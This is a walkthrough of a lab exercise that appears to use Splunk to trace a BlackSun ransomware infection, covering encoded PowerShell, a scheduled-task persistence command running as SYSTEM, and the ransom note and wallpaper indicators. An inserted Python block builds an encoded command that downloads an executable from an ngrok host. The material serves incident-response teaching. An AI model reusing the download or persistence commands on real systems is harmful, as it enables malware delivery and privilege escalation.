Splunk

Manpreet kaur
4 min read, Feb 12, 2023


Splunk is a platform commonly used to secure networks and the devices on them by monitoring, searching, analyzing and visualizing machine-generated data in real time. It indexes and correlates events so that they can be searched easily and used to generate alerts, reports and visualizations. This makes it possible to analyze large data sets, detect malicious activity and respond to threats across environments faster and more accurately than with legacy SIEM systems.

Working with Splunk

How Splunk is used depends on the situation. In this case, the task is to review the events in Splunk to investigate what happened on Keegan's device on Monday, May 16th, 2022, when the client noted that the machine was operational but some files had a strange file extension. Splunk can be accessed either from the AttackBox or over OpenVPN; for VPN access, install the OpenVPN client and connect to the machine's IP address.

Once connected to the machine, the first task is to find the name of the suspicious binary. To do this, retrieve the data while selecting useful fields such as sourceport, destinationport, destinationip, filepath and filename.

If the file was downloaded, the destination port will most likely be 80 or 443.

Applying a filter for port 80 returns events related to PowerShell.

Decoding this information (base64) reveals the name of the binary, i.e. OUTSTANDING_GUTTER.exe, along with the address from which the binary was downloaded. Defanging that address gives the second answer: hxxp[://]886e-181-215-214-32[.]ngrok[.]io.
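The decode-and-defang step described above, as an added example that is not part of the original post: PowerShell's -EncodedCommand payload is base64 over UTF-16LE (decoding it as UTF-8 yields garbage), so the helper below pulls the blob out of a process command line, decodes it, and reports the .exe name and the defanged download server. The SAMPLE_COMMAND is constructed for this example; it mirrors what the post describes but is not the actual payload from the investigation.

```python
import base64
import re
from urllib.parse import urlsplit

# Constructed sample standing in for the encoded PowerShell seen in the
# port-80 events; the real payload from the investigation is not reproduced.
SAMPLE_COMMAND = (
    "Invoke-WebRequest -Uri http://886e-181-215-214-32.ngrok.io/OUTSTANDING_GUTTER.exe"
    " -OutFile C:\\Windows\\Temp\\OUTSTANDING_GUTTER.exe"
)

# PowerShell accepts -e, -ec, -enc and -EncodedCommand, case-insensitively.
ENC_FLAG_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s\"']+")
EXE_RE = re.compile(r"[\w-]+\.exe", re.I)


def encode_ps(command: str) -> str:
    """Build an -EncodedCommand payload: base64 over UTF-16LE, not UTF-8."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_ps(encoded: str) -> str:
    """Decode an -EncodedCommand payload back to the script text."""
    return base64.b64decode(encoded).decode("utf-16-le")


def encoded_payload(cmdline: str):
    """Pull the base64 blob out of a process command line, or None if absent."""
    match = ENC_FLAG_RE.search(cmdline)
    return match.group(1) if match else None


def defang(url: str) -> str:
    """Report-safe hxxp[://]host[.]tld form; only the scheme and host change."""
    scheme, _, rest = url.partition("://")
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "[://]" + host.replace(".", "[.]") + sep + path


def extract_iocs(script: str) -> dict:
    """Binary names and defanged download servers found in decoded script text."""
    urls = URL_RE.findall(script)
    servers = {defang(f"{urlsplit(u).scheme}://{urlsplit(u).netloc}") for u in urls}
    return {"binaries": sorted(set(EXE_RE.findall(script))), "servers": sorted(servers)}


if __name__ == "__main__":
    cmdline = "powershell.exe -NoP -W Hidden -Enc " + encode_ps(SAMPLE_COMMAND)
    print(extract_iocs(decode_ps(encoded_payload(cmdline))))
```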

The next task is to find the path of the Windows executable that was used to download the suspicious binary. This can be identified by selecting the field "parentimage", which shows the path of powershell.exe.

The next task is to find the command that was executed to configure the suspicious binary to run with elevated privileges. It can be found in the same base64-decoded value.

According to this information, the command used was "C:\Windows\system32\schtasks.exe" /Create /TN OUTSTANDING_GUTTER.exe /TR C:\Windows\Temp\COUTSTANDING_GUTTER.exe /SC ONEVENT /EC Application /MO *[System/EventID=777] /RU SYSTEM /f. The same data answers the next question, which asks for the permissions the suspicious binary will run with and the command used to run it: NT AUTHORITY\SYSTEM; "C:\Windows\system32\schtasks.exe" /Run /TN OUTSTANDING_GUTTER.exe

The next task is to find the address of the remote server the binary connected to. Selecting the field "queryname" shows an event whose queryname value, once defanged, gives the correct answer: hxxp[://]9030-181-215-214-32[.]ngrok[.]io

The next task is to identify the name of the PowerShell script that was downloaded to the same location as the suspicious binary. Typing the ".ps1" extension in the search bar returns several results. Checking the hash of each of these files on a site such as VirusTotal shows that the only malicious one is script.ps1. Thus, the correct answer is "script.ps1".

The next task is to find the actual name of the script that was flagged as malicious. Looking up the file's MD5 hash on virustotal.com gives details of the script, including its real name: BlackSun.ps1

The next question asks for the full path the ransomware note was saved to, which can serve as an IOC. The note can only be a .txt file, so searching for the .txt extension in the search bar is the right approach; it shows 3 files, of which only 1 is in the "Downloads" directory. Hence, the correct answer is C:\Users\keegan\Downloads\vasg6b0wmw029hd\BlackSun_README.txt

The last question asks for the path of the image saved to disk to replace the user's desktop wallpaper, which can also serve as an IOC. This can be found by searching for an image extension such as .jpg. That search returns 2 results, and the one belonging to BlackSun is C:\Users\Public\Pictures\blacksun.jpg
